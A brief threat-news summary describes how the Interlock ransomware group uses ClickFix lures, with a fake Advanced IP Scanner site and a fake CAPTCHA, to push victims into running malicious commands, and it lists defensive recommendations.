<ul><li>Ransomware group Interlock is using the ClickFix technique to target businesses, posing as the Advanced IP Scanner website.</li><li>Interlock lures victims to a fake CAPTCHA page imitating Cloudflare, tricking them into executing a malicious PowerShell command.</li><li>Once the command is executed, a fake PyInstaller installer launches, allowing Interlock to collect system information and deploy malware like a remote access Trojan.</li><li>To protect against ClickFix attacks, it is recommended to raise employee awareness, install reliable protection on devices, monitor for suspicious activities, and consider external threat hunting services.</li></ul>

Ransomware group uses ClickFix to attack businesses

Discover more